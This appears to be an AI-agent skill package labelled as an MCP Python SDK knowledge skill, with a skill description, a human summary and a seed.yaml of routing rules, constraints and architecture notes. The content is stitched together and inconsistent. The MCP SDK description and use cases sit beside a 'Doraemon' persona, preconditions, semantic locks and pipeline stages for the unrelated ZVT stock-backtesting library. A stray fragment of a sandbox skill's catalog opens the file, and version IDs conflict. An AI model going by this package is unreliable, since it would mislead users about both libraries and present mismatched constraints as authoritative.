          short_description: 'Cost-efficient long-lived agent loops: only pay for active time, automatic wake on first request
            after pause'
          sample_triggers:
          - auto_pause
          - auto_resume
          - lifecycle
        - uc_id: UC-007
          name: Signed file URLs for browser/CDN-direct upload-download
          short_description: Move large files in/out of sandbox without round-tripping through SDK process — bypass the 60s
            default request_timeout and the in-RAM upload body
          sample_triggers:
          - signed url
          - download_url
          - upload_url
        - uc_id: UC-009
          name: Mount persistent volume across sandbox lifecycles
          short_description: Share data between sandbox instances or persist beyond a single sandbox's lifetime (e.g., shared
            workspace, pretrained model cache)
          sample_triggers:
          - volume
          - mount
          - persistent
      - group_id: extension_example
        name: Extension Example
        description: ''
        emoji: 📦
        uc_count: 1
        ucs:
        - uc_id: UC-008
          name: 'MCP gateway: bridge sandbox to external MCP servers (GitHub, Slack, etc.)'
          short_description: Let in-sandbox agent talk to MCP-protocol services (GitHub MCP, Slack MCP, etc.) with a single
            tunnel
          sample_triggers:
          - mcp
          - gateway
          - mcp_token
    call_to_action: Tell me which one you want to try.
    featured_entries:
    - uc_id: UC-001
      beginner_prompt: Try run a one-off shell command and capture output
      auto_selected: true
    - uc_id: UC-002
      beginner_prompt: Try long-running background server with port exposure
      auto_selected: true
    - uc_id: UC-003
      beginner_prompt: Try file upload, edit, and watch for filesystem events
      auto_selected: true
    more_info_hint: Ask me 'what else can you do?' to see all 9 capabilities.
  locale_rendering:
    instruction: On skill_installation_complete, translate ALL user-facing strings (positioning + capability_catalog.groups[].name
      + capability_catalog.groups[].description + capability_catalog.groups[].ucs[].short_description + call_to_action + featured_entries[].beginner_prompt
      + more_info_hint) into detected user locale per locale_contract. Preserve UC-IDs, group_id, emoji, and sample_triggers
      verbatim.
    preserve_verbatim:
    - UC-IDs
    - group_id
    - emoji
    - sample_triggers
    - technical_class_names
  enforcement:
    action: 'Host agent MUST send composed message to user as the FIRST user-facing response after skill_installation_complete
      event. Message MUST contain: positioning, capability_catalog (rendered as markdown tables per group), 3 featured_entries,
      call_to_action, and more_info_hint.'
    violation_code: PIN-01
    violation_signal: First user-facing message post-install does not contain the full capability_catalog (all UCs grouped)
      OR skips featured_entries OR skips call_to_action.
human_summary:
  persona: Doraemon
  what_i_can_do:
    tagline: 'I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me
      what you want; I''ll write the code, you don''t have to dig docs. (Heads up: ZVT natively supports A-share, HK, and
      crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don''t bother for serious work.)'
    use_cases:
    - File upload, edit, and watch for filesystem events
    - Long-running background server with port exposure
    - Run a one-off shell command and capture output
    - A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
    - 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader'
    - Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
    - Index composition data collection (SZ1000, SZ2000) with EM recorder
  what_i_auto_fetch:
  - ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
  - Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
  - Fatal constraints (finance-C-*) relevant to your target strategy type
  - 'Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY'
  - Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
  - Provider-specific recorder class names and required class attributes
  what_i_ask_you:
  - 'Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage
    is thin)'
  - 'Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare,
    or qmt (broker)?'
  - 'Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?'
  - 'Time range: start_timestamp and end_timestamp for backtest period'
  - 'Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?'
  locale_rendering:
    instruction: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona
      (direct, frank, mildly snarky, knows limits).
    preserve_verbatim:
    - BD-IDs
    - SL-IDs
    - UC-IDs
    - finance-C-IDs
    - class_names
    - function_names
    - file_paths
    - numeric_thresholds

ClawHub Coding Backend+2

T@clawhub-tangweigang-jpg-8679fec286

Mcp Python Sdk

Skill

MCP Python SDK：Anthropic 主导的 Model Context Protocol 参考实现。2 server 层 + 3 transport + 3 原语 + 4 协议版本 + 50 条约束。 MCP Python SDK: reference Python implementation o...

---
name: mcp-python-sdk
description: |-
  MCP Python SDK：Anthropic 主导的 Model Context Protocol 参考实现。2 server 层 + 3 transport + 3 原语 + 4 协议版本 + 50 条约束。
  MCP Python SDK: reference Python implementation of the Model Context Protocol (Anthropic-led). Two server surfaces (low-level Server / high-level MCPServer, formerly FastMCP), three transports (stdio / SSE / streamable-http), and three primitives (Tools / Resources / Prompts).
license: MIT-0
compatibility: AI engineering knowledge skill — host AI consumes seed.yaml directly. No installation required.
metadata:
  version: "v0.1.0"
  blueprint_id: "finance-bp-140"
  blueprint_source: "modelcontextprotocol/python-sdk"
  blueprint_commit: "3d7b311de07aade1281d18aa7b04689a81ab8793"
  category: ai-engineering
  doramagic_url: "https://doramagic.ai/zh/crystal/mcp-python-sdk"
  openclaw:
    skillKey: mcp-python-sdk
    category: ai-engineering
    primaryEnv: knowledge
---
# 这个 skill 适合什么用户？能做哪些任务？

## 概览

MCP Python SDK 是 Model Context Protocol 的参考实现（github.com/modelcontextprotocol/python-sdk）—— Anthropic 主导的开放标准，让 AI host（Claude / Cursor 等）通过 JSON-RPC 2.0 跟工具服务端对话。

两个 server 接口：低层 Server（构造器注入 handler）和高层 MCPServer（装饰器 API，原名 FastMCP）。三个传输共享结构化 (read_stream, write_stream) AnyIO 契约：stdio（行分隔 JSON）、传...

**Doramagic 晶体页**: https://doramagic.ai/zh/crystal/mcp-python-sdk

## 知识规模

- **50 条约束** (1 fatal + 49 non-fatal)
- 上游源码: `modelcontextprotocol/python-sdk` @ commit `3d7b311d`
- 蓝图 ID: `finance-bp-140`

## 用法

Host AI（Claude Code / Cursor / OpenClaw）读 `references/seed.yaml`，按其中的：
- `intent_router` 匹配用户意图
- `architecture` 理解项目架构
- `constraints` 应用 anti-pattern 约束
- `business_decisions` 参考核心设计决策

## FAQ 摘要

### 这个 skill 适合什么用户？能做哪些任务？
适合需要给 Claude / Cursor 等 AI host 提供工具服务的工程师：发布公司内部 API 给 AI 调用、暴露文件 / 数据库为 Resources、提供 prompt 模板等。本 skill 覆盖 stdio（本地）/ SSE（旧）/ streamable-http（推荐）三种 server 形态。访问 doramagic.ai/r/mcp-python-sdk 查看完整说明。

### 需要准备什么环境？依赖什么？
Python 3.10+，AnyIO（asyncio 或 trio 后端），Pydantic v2（type schema 生成），Starlette（HTTP/SSE/streamable-http 托管），OpenTelemetry（可选，分布式追踪）。Windows 客户端 stdio 需 pywin32 用于 Job Object 进程树终止；POSIX 用 os.killpg。

### 会踩哪些坑？这个 skill 怎么防护？
本 skill 内置 50 条约束（1 条 fatal）。典型踩坑：(1) commit 3d7b311 的 README 仍 import 改名前的 FastMCP（26 处 import 行 + 10 处文件路径失效），照抄 quickstart 必失败；

---

完整文档: 见 `references/seed.yaml` (v6.1 schema). 浏览页: https://doramagic.ai/zh/crystal/mcp-python-sdk

FILE:human_summary.md
# finance-bp-140-v6.1 — Human Summary

**Persona**: Doraemon

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- LLM-sampling tool (server invokes client LLM)
- Lifespan-managed DB tool
- Decorator-style stdio server (Quickstart)
- A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
- End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader
- Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
- Index composition data collection (SZ1000, SZ2000) with EM recorder

## What I Auto-Fetch

- ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
- Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
- Fatal constraints (finance-C-*) relevant to your target strategy type
- Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY
- Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
- Provider-specific recorder class names and required class attributes

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Locale Rendering

**Instruction**: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona (direct, frank, mildly snarky, knows limits).

**Preserve verbatim**: BD-IDs, SL-IDs, UC-IDs, finance-C-IDs, class_names, function_names, file_paths, numeric_thresholds

---

*Generated by compile_crystal_skeleton.py v5.0 for finance-bp-140-v6.1*
*All content is English source — agent translates on first user contact.*
FILE:references/seed.yaml
meta:
  id: finance-bp-140-v6.1
  version: v6.1
  blueprint_id: finance-bp-140
  sop_version: crystal-compilation-v6.1
  source_language: en
  compiled_at: '2026-04-25T09:07:15.815631+00:00'
  target_host: openclaw
  authoritative_artifact:
    primary: seed.yaml
    non_authoritative_derivatives:
    - SKILL.md (host-generated summary, may lag)
    - HEARTBEAT.md (host telemetry)
    - memory/*.md (host conversational memory)
    rule: On any behavioral decision (preconditions check, OV assertion, EQ rule firing, spec_lock verification), agents MUST
      re-read seed.yaml. Derivatives are for UI display only and may be out-of-date.
  execution_protocol:
    install_trigger:
    - Execute resources.host_adapter.install_recipes[] in declared order
    - Verify each package with import check before proceeding
    execute_trigger: When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)
    on_execute:
    - Reload seed.yaml (do not rely on SKILL.md or cached summaries)
    - Run preconditions[] in declared order; halt on first fatal failure with on_fail message to user
    - Enter context_state_machine.CA1_MEMORY_CHECKED state
    - Evaluate evidence_quality.enforcement_rules[]; prepend user_disclosure_template
    - Translate user_facing_fields to user locale per locale_contract
    workspace_resolution:
      scripts_path: '{host_workspace}/scripts/'
      skills_path: '{host_workspace}/skills/'
      trace_path: '{host_workspace}/.trace/'
locale_contract:
  source_language: en
  user_facing_fields:
  - human_summary.what_i_can_do.tagline
  - human_summary.what_i_can_do.use_cases[]
  - human_summary.what_i_auto_fetch[]
  - human_summary.what_i_ask_you[]
  - evidence_quality.user_disclosure_template
  - post_install_notice.message_template.positioning
  - post_install_notice.message_template.capability_catalog.groups[].name
  - post_install_notice.message_template.capability_catalog.groups[].description
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].name
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].short_description
  - post_install_notice.message_template.call_to_action
  - post_install_notice.message_template.featured_entries[].beginner_prompt
  - post_install_notice.message_template.more_info_hint
  - preconditions[].description
  - preconditions[].on_fail
  - intent_router.uc_entries[].name
  - intent_router.uc_entries[].ambiguity_question
  - architecture.pipeline
  - architecture.stages[].narrative.does_what
  - architecture.stages[].narrative.key_decisions
  - architecture.stages[].narrative.common_pitfalls
  - constraints.fatal[].consequence
  - constraints.regular[].consequence
  - output_validator.assertions[].failure_message
  - acceptance.hard_gates[].on_fail
  - skill_crystallization.action
  locale_detection_order:
  - explicit_user_declaration
  - first_message_language
  - system_locale
  translation_enforcement:
    trigger: on_first_user_message
    action: Render user_facing_fields in detected locale, preserving all IDs (BD-/SL-/UC-/finance-C-) and code identifiers
      verbatim
    violation_code: LOCALE-01
    violation_signal: User receives untranslated English Human Summary when detected locale != en
evidence_quality:
  declared:
    evidence_coverage_ratio: null
    evidence_verify_ratio: null
    evidence_invalid: 0
    evidence_verified: null
    evidence_auto_fixed: null
    audit_coverage: 20 finance-universal not_applicable + 3 AIL warn + 3 AIL not_applicable + 2 DAT warn + 1 DAT pass + 2
      DAT not_applicable = 31 items reviewed across applicable scope
    audit_pass_rate: 1/6 (17% applicable items pass; 5 warn items capture the architectural divergences and risk surfaces
      worth surfacing as constraints)
    audit_fail_total: 0
    audit_finance_universal:
      pass: 0
      warn: 0
      fail: 0
    audit_subdomain_totals:
      pass: 0
      warn: 0
      fail: 0
  enforcement_rules:
  - id: EQ-01
    trigger: declared.evidence_verify_ratio < 0.5
    action: MUST invoke traceback lookup for all cited BD-IDs in output before emitting business code — read LATEST.yaml sections
      for each BD referenced
    violation_code: EQ-01-V
    violation_signal: Generated script references BD-IDs but no tool_call to read LATEST.yaml preceded code generation
  - id: EQ-02
    trigger: always
    action: MUST prepend user_disclosure_template (translated to user locale) to first user-facing response
    violation_code: EQ-02-V
    violation_signal: First agent response to user does not contain audit warning phrase
  user_disclosure_template: '[QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-140. Evidence verify ratio
    = 0.0% and audit fail total = 0. Generated results may have uncaptured requirement gaps. Verify critical decisions against
    source files (LATEST.yaml / LATEST.jsonl).'
traceback:
  source_files:
    blueprint: LATEST.yaml
    constraints: LATEST.jsonl
  mandatory_lookup_scenarios:
  - id: TB-01
    condition: Two constraints have apparently conflicting enforcement rules
    lookup_target: LATEST.jsonl — find both constraint IDs, compare `consequence` + `evidence_refs` to determine priority
  - id: TB-02
    condition: A business decision rationale is unclear or disputed
    lookup_target: LATEST.yaml — locate BD-ID under business_decisions, read `rationale` + `alternative_considered` fields
  - id: TB-03
    condition: evidence_invalid > 0 in evidence_quality.declared
    lookup_target: LATEST.yaml _enrich_meta — cross-check specific BD `evidence_refs` fields for invalid markers
  - id: TB-04
    condition: User asks where a rule comes from
    lookup_target: LATEST.jsonl — find constraint by ID, read `confidence.evidence_refs` for source file + line number
  - id: TB-05
    condition: Generated code does not match expected ZVT API behavior
    lookup_target: LATEST.yaml stages[].required_methods — verify method signature and evidence locator in source code
  degraded_lookup:
    no_fs_access: 'Ask the user to paste the relevant LATEST.yaml section or LATEST.jsonl lines for the BD-/finance-C- IDs
      in question. Crystal ID: finance-bp-140-v5.0.'
trace_schema:
  event_types:
  - precondition_check
  - spec_lock_check
  - evidence_rule_fired
  - evidence_rule_skipped
  - locale_translation_emitted
  - hard_gate_passed
  - hard_gate_failed
  - skill_emitted
  - false_completion_claim
preconditions:
- id: PC-01
  description: zvt package installed and importable
  check_command: python3 -c 'import zvt; print(zvt.__version__)'
  on_fail: 'Run: python3 -m pip install zvt  then re-run: python3 -m zvt.init_dirs to initialize data directories'
  severity: fatal
- id: PC-02
  description: K-data exists for target entities (required before backtesting)
  check_command: python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1);
    assert df is not None and len(df) > 0, 'No kdata found'"
  on_fail: 'Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000  (replace
    with your target entity IDs)'
  severity: fatal
  applies_to_uc: []
- id: PC-03
  description: ZVT data directory initialized (~/.zvt or ZVT_HOME)
  check_command: 'python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get(''ZVT_HOME'', Path.home()
    / ''.zvt'')); assert zvt_home.exists(), f''ZVT home not found: {zvt_home}''"'
  on_fail: 'Run: python3 -m zvt.init_dirs'
  severity: fatal
- id: PC-04
  description: SQLite write permission for ZVT data directory
  check_command: python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home()
    / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"
  on_fail: 'Check directory permissions: chmod u+w ~/.zvt  or set ZVT_HOME environment variable to a writable location'
  severity: warn
intent_router:
  uc_entries:
  - uc_id: UC-001
    name: Decorator-style stdio server (Quickstart)
    positive_terms:
    - quickstart
    - stdio server
    - decorator API
    - hello world
    data_domain: technical_demo
    negative_terms:
    - production deployments (use streamable-http)
    - networked / remote clients
  - uc_id: UC-002
    name: Lifespan-managed DB tool
    positive_terms:
    - lifespan
    - dependency injection
    - DB connection pool
    - typed Context
    data_domain: technical_demo
    negative_terms:
    - per-request scoped resources (use Context for that)
  - uc_id: UC-003
    name: LLM-sampling tool (server invokes client LLM)
    positive_terms:
    - sampling
    - server-to-client LLM call
    - thinking tools
    - delegate to host LLM
    data_domain: technical_demo
    negative_terms:
    - stateless HTTP deployments (raises StatelessModeNotSupported)
    - clients without sampling capability
  - uc_id: UC-004
    name: Form + URL elicitation
    positive_terms:
    - elicitation
    - form input
    - URL flow
    - OAuth confirmation
    - payment
    data_domain: technical_demo
    negative_terms:
    - stateless deployments
    - non-interactive automation
  - uc_id: UC-005
    name: Long-running tool with progress
    positive_terms:
    - long-running tool
    - progress reporting
    - ctx.report_progress
    - ctx.info logging
    data_domain: technical_demo
    negative_terms:
    - synchronous quick-return tools
  - uc_id: UC-006
    name: OAuth-protected server
    positive_terms:
    - OAuth2
    - bearer token
    - authentication
    - AuthSettings
    - TokenVerifier
    data_domain: technical_demo
    negative_terms:
    - public / unauthenticated tool servers
  - uc_id: UC-007
    name: Stateless streamable-HTTP for K8s scaling
    positive_terms:
    - stateless HTTP
    - production config
    - K8s scaling
    - json_response
    - high throughput
    data_domain: technical_demo
    negative_terms:
    - tools needing sampling / elicitation / list_roots (silent break — see pitfall-003)
    - session_idle_timeout (raises RuntimeError "session_idle_timeout is not supported in stateless mode")
  - uc_id: UC-008
    name: Mount multiple MCP servers in one Starlette app
    positive_terms:
    - mount multiple servers
    - Starlette mount
    - microservice gateway
    - ASGI host
    data_domain: technical_demo
    negative_terms:
    - single-server deployments
  - uc_id: UC-009
    name: Resumable connection via custom EventStore
    positive_terms:
    - resumable HTTP
    - EventStore
    - Last-Event-ID
    - replay
    - long-lived connections
    data_domain: technical_demo
    negative_terms:
    - simple stateless deployments
    - servers without external event storage
  - uc_id: UC-010
    name: Pagination cursor over large lists
    positive_terms:
    - pagination
    - cursor
    - large list response
    - page tokens
    data_domain: technical_demo
    negative_terms:
    - small / static lists
  - uc_id: UC-011
    name: Experimental task subsystem (long-running async tools)
    positive_terms:
    - long-running tasks
    - async task subsystem
    - TaskStore
    - MessageQueue
    - experimental
    data_domain: technical_demo
    negative_terms:
    - synchronous quick tools
    - production-critical workloads (subsystem is experimental)
  - uc_id: UC-012
    name: Structured output schema
    positive_terms:
    - structured output
    - Pydantic return type
    - TypedDict
    - dataclass
    - output schema
    data_domain: technical_demo
    negative_terms:
    - tools that need to return arbitrary unstructured strings (use str return type)
context_state_machine:
  states:
  - id: CA1_MEMORY_CHECKED
    entry: Task started
    exit: All memory queries attempted and recorded; memory_unavailable set if failed
    timeout: 30s — skip memory, mark memory_unavailable=true, proceed to CA2
  - id: CA2_GAPS_FILLED
    entry: CA1 complete
    exit: 'All FATAL-priority required inputs answered: target market (A-share/HK/US), data source, time range, strategy type'
    timeout: NOT skippable — FATAL inputs MUST be user-answered before proceeding
  - id: CA3_PATH_SELECTED
    entry: CA2 complete
    exit: intent_router matched single use case with confidence gap > 20% over next candidate, no data_domain ambiguity
    timeout: Trigger ambiguity_question for top-2 candidates, await user selection
  - id: CA4_EXECUTING
    entry: CA3 complete + user explicit confirmation received
    exit: All hard gates G1-Gn passed and output files written
    timeout: NOT skippable — user confirmation of execution path required
  enforcement: Code generation is PROHIBITED before CA4_EXECUTING. Any regression to earlier state MUST be announced to user.
    buy/sell ordering SL-01 check runs at CA4 entry.
spec_lock_registry:
  semantic_locks:
  - id: SL-01
    description: Execute sell orders before buy orders in every trading cycle
    locked_value: sell() called before buy() in each Trader.run() iteration
    violation_is: fatal
    source_bd_ids:
    - BD-018
  - id: SL-02
    description: Trading signals MUST use next-bar execution (no look-ahead)
    locked_value: due_timestamp = happen_timestamp + level.to_second()
    violation_is: fatal
    source_bd_ids:
    - BD-014
    - BD-025
  - id: SL-03
    description: Entity IDs MUST follow format entity_type_exchange_code
    locked_value: stock_sh_600000 | stockhk_hk_0700 | stockus_nasdaq_AAPL
    violation_is: fatal
    source_bd_ids: []
  - id: SL-04
    description: DataFrame index MUST be MultiIndex (entity_id, timestamp)
    locked_value: df.index.names == ['entity_id', 'timestamp']
    violation_is: fatal
    source_bd_ids: []
  - id: SL-05
    description: 'TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount'
    locked_value: XOR enforcement in trading/__init__.py:68
    violation_is: fatal
    source_bd_ids: []
  - id: SL-06
    description: 'filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION'
    locked_value: factor.py:475 order_type_flag mapping
    violation_is: fatal
    source_bd_ids: []
  - id: SL-07
    description: Transformer MUST run BEFORE Accumulator in factor pipeline
    locked_value: 'compute_result(): transform at :403 before accumulator at :409'
    violation_is: fatal
    source_bd_ids: []
  - id: SL-08
    description: 'MACD parameters locked: fast=12, slow=26, signal=9'
    locked_value: factors/algorithm.py:30 macd(slow=26, fast=12, n=9)
    violation_is: fatal
    source_bd_ids:
    - BD-036
  - id: SL-09
    description: 'Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001'
    locked_value: sim_account.py:25 SimAccountService default costs
    violation_is: warning
    source_bd_ids:
    - BD-029
  - id: SL-10
    description: A-share equity trading is T+1 (no same-day close of buy positions)
    locked_value: sim_account.available_long filters by trading_t
    violation_is: fatal
    source_bd_ids: []
  - id: SL-11
    description: Recorder subclass MUST define provider AND data_schema class attributes
    locked_value: contract/recorder.py:71 Meta; register_schema decorator
    violation_is: fatal
    source_bd_ids: []
  - id: SL-12
    description: Factor result_df MUST contain either 'filter_result' OR 'score_result' column
    locked_value: result_df.columns.intersection({'filter_result', 'score_result'}) non-empty
    violation_is: fatal
    source_bd_ids: []
  implementation_hints:
  - id: IH-01
    hint: 'Use AdjustType enum exactly: qfq (pre-adjust), hfq (post-adjust), bfq (none) — contract/__init__.py:121'
  - id: IH-02
    hint: For A-share kdata, default to hfq for long-term analysis (dividend-adjusted) — trader.py:538 StockTrader
  - id: IH-03
    hint: SQLite connection MUST use check_same_thread=False for multi-threaded recorders
  - id: IH-04
    hint: Accumulator state serialization uses JSON with custom encoder/decoder hooks — contract/base_service.py
  - id: IH-05
    hint: Factor.level MUST match TargetSelector.level (enforced at add_factor) — factors/target_selector.py:84
preservation_manifest:
  required_objects:
    business_decisions_count: 27
    fatal_constraints_count: 1
    non_fatal_constraints_count: 49
    use_cases_count: 12
    semantic_locks_count: 12
    preconditions_count: 4
    evidence_quality_rules_count: 2
    traceback_scenarios_count: 5
architecture:
  pipeline: data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization
  stages:
  - id: data_collection
    narrative:
      does_what: TimeSeriesDataRecorder and FixedCycleDataRecorder fetch OHLCV and fundamental data from providers (eastmoney,
        joinquant, baostock, akshare) and persist domain objects (Stock1dKdata, BalanceSheet) to SQLite via df_to_db().
      key_decisions: BD-002 chose evaluate_start_end_size_timestamps for incremental fetch (not full refresh) because comparing
        to get_latest_saved_record avoids redundant API calls; BD-003 chose get_data_map field transformation to keep domain
        schema provider-agnostic.
      common_pitfalls: 'Don''t forget SL-11: Recorder subclass MUST declare both provider and data_schema class attributes
        else initialization fails with assertion error; finance-C-001 fatal violation.'
    business_decisions: []
  - id: data_storage
    narrative:
      does_what: StorageBackend persists DataFrames to per-provider SQLite databases at {data_path}/{provider}/{provider}_{db_name}.db
        using path templates from _get_path_template; Mixin.record_data and Mixin.query_data provide uniform read/write interface.
      key_decisions: BD-004 chose StorageBackend abstraction (not hardcoded SQLite) to allow future cloud storage swap; BD-006
        derives db_name from data_schema __tablename__ for per-domain database isolation.
      common_pitfalls: SL-04 violation (wrong DataFrame index) causes factor pipeline failures downstream; always ensure df.index.names
        == ['entity_id', 'timestamp'] before calling record_data.
    business_decisions: []
  - id: factor_computation
    narrative:
      does_what: Factor.compute() applies Transformer (stateless, e.g. MacdTransformer) then Accumulator (stateful, e.g. MaStatsAccumulator)
        to produce filter_result or score_result columns; EntityStateService persists per-entity rolling state across batches.
      key_decisions: BD-007 chose Factor inheriting DataReader for composable data access; SL-08 locks MACD at (fast=12, slow=26,
        n=9) — chose standard Appel parameters not adaptive because interpretability matters for practitioners.
      common_pitfalls: 'SL-07: Transformer MUST run before Accumulator — swapping order causes NaN propagation; SL-12: result_df
        must contain filter_result OR score_result column or TargetSelector silently drops all signals.'
    business_decisions: []
  - id: target_selection
    narrative:
      does_what: TargetSelector.add_factor() registers Factor instances; get_targets() returns entity_ids passing threshold
        filter at a specific timestamp, enabling point-in-time historical backtesting without look-ahead.
      key_decisions: BD-012 chose registrable factor list (not hardcoded) for runtime customization; BD-013 chose timestamp-specific
        filtering not current-only because backtests need historical point-in-time correctness.
      common_pitfalls: Factor.level MUST match TargetSelector.level (IH-05); mismatched levels cause silent empty target lists
        that look like no signals but are actually level-mismatch bugs.
    business_decisions: []
  - id: trading_execution
    narrative:
      does_what: Trader.run() calls sell() before buy() each cycle, generates TradingSignals with due_timestamp = happen_timestamp
        + level.to_second() for next-bar execution, and applies on_profit_control() for stop-loss/take-profit before regular
        target selection.
      key_decisions: SL-01 locks sell-before-buy order because available_long check in sim_account depends on it — chose this
        over symmetric ordering to prevent implicit leverage; BD-039 chose long=AND/short=OR multi-level logic to reflect
        risk asymmetry.
      common_pitfalls: 'SL-02 violation (immediate execution instead of next-bar) introduces look-ahead bias and makes backtest
        results unreproducible in live trading; SL-10: A-share T+1 constraint — backtesting without it overstates returns.'
    business_decisions: []
  - id: visualization
    narrative:
      does_what: Drawer.draw() combines kline main chart with factor overlays and Rect annotations for entry/exit signals
        using Plotly; Drawable interface on Factor enables consistent chart rendering across data types.
      key_decisions: BD-019 chose drawer_rects subclass override for custom annotations not hardcoded markers — allows traders
        to define entry/exit visuals without modifying base drawing logic.
      common_pitfalls: draw_result=True by default (BD-055) is fine for development but set draw_result=False in production/headless
        environments to avoid Plotly server startup overhead.
    business_decisions: []
  - id: cross_cutting_concerns
    narrative:
      does_what: 'Invariants and utilities that span multiple pipeline stages — collected from 6 source groups: capability_negotiate(2),
        cross_cutting(5), server_setup(4), server_to_client_capabilities(3), three_primitives(2), transport_select(11).'
      key_decisions: 27 BDs merged here because they apply to more than one main stage (e.g. algorithm helpers, default value
        choices, ordering contracts, error handling). Agent should inspect individual BD summaries and link back to affected
        main stages via shared IDs.
      common_pitfalls: Cross-cutting concerns frequently surface as bugs when changes to one main stage unintentionally break
        another. Check constraints referencing these BDs and verify invariants still hold after any stage-local modification.
    business_decisions:
    - id: BD-004
      type: B
      summary: Capabilities AUTO-DERIVED from registered handlers (no manual capability declaration)
    - id: BD-008
      type: B
      summary: Strict initialize state machine — server refuses any non-Ping request before notifications/initialized
    - id: BD-023
      type: missing
      summary: README still uses FastMCP imports (26 import-statement occurrences) and broken file paths (10 references)
    - id: BD-024
      type: missing
      summary: No rate-limiting / request quotas at session level
    - id: BD-025
      type: missing
      summary: Origin / Host validation for SSE / streamable-http is opt-in only for non-localhost
    - id: BD-026
      type: missing
      summary: Generic Exception in handler → ErrorData(code=0) — non-standard JSON-RPC code
    - id: BD-027
      type: missing
      summary: '@tool / @resource without parens raises TypeError at decoration time (loud, but message could be friendlier)'
    - id: BD-001
      type: B
      summary: Two-tier API split — high-level MCPServer (decorator) composes low-level Server (constructor injection)
    - id: BD-012
      type: T
      summary: Pydantic v2 for type schemas + JSON-RPC envelope validation
    - id: BD-014
      type: T
      summary: OpenTelemetry via opentelemetry.trace
    - id: BD-021
      type: BA
      summary: Duplicate primitive registration is a WARNING, not an error; existing wins
    - id: BD-007
      type: B
      summary: UrlElicitationRequiredError gets a dedicated -32042 error code
    - id: BD-010
      type: B
      summary: Stateless mode disables sampling / elicitation / list_roots — raises StatelessModeNotSupported
    - id: BD-022
      type: DK
      summary: MCP spec is Anthropic-driven; semantics like "elicitation/URL mode" reflect Claude.ai product needs (OAuth
        flows, payment confirmation)
    - id: BD-002
      type: B
      summary: Three primitives Tool / Resource / Prompt with NO enforced semantic boundary
    - id: BD-006
      type: B
      summary: Tool exception → CallToolResult(is_error=True), NOT protocol-level JSON-RPC error
    - id: BD-003
      type: B
      summary: JSON-RPC 2.0 over line-delimited JSON for stdio, SSE-or-JSON over HTTP for streamable-http
    - id: BD-005
      type: B
      summary: Streamable-HTTP recommended for production over SSE
    - id: BD-009
      type: B
      summary: StreamableHTTPSessionManager.run() is single-shot per instance
    - id: BD-011
      type: T
      summary: AnyIO over raw asyncio
    - id: BD-013
      type: T
      summary: Starlette as ASGI host for HTTP / SSE / streamable-http
    - id: BD-015
      type: T
      summary: pywin32 Job Object for Windows process tree termination (client-side stdio)
    - id: BD-016
      type: BA
      summary: DNS-rebinding protection auto-on ONLY for 127.0.0.1 / localhost / ::1
    - id: BD-017
      type: BA
      summary: Default stdio inherited env vars — Unix 6 (HOME, LOGNAME, PATH, SHELL, TERM, USER) / Windows 12 (APPDATA, HOMEDRIVE,
        HOMEPATH, LOCALAPPDATA, PATH, PATHEXT, PROCESSOR_ARCHITECTURE, SYSTEMDRIVE, SYSTEMR
    - id: BD-018
      type: BA
      summary: errors="replace" on stdin decoding, errors="strict" on stdout
    - id: BD-019
      type: BA
      summary: PROCESS_TERMINATION_TIMEOUT = 2.0s for client-side stdio subprocess termination
    - id: BD-020
      type: BA
      summary: Priming events for SSE resumability gated on protocol version >= "2025-11-25"
resources:
  packages:
  - name: AnyIO
    version_pin: latest
  - name: Pydantic v2
    version_pin: latest
  - name: Starlette
    version_pin: latest
  - name: OpenTelemetry (opentelemetry.trace)
    version_pin: latest
  - name: pywin32 (Windows only)
    version_pin: latest
  strategy_scaffold:
    entry_point_name: run_backtest
    output_path: result.csv
    execution_mode: backtest
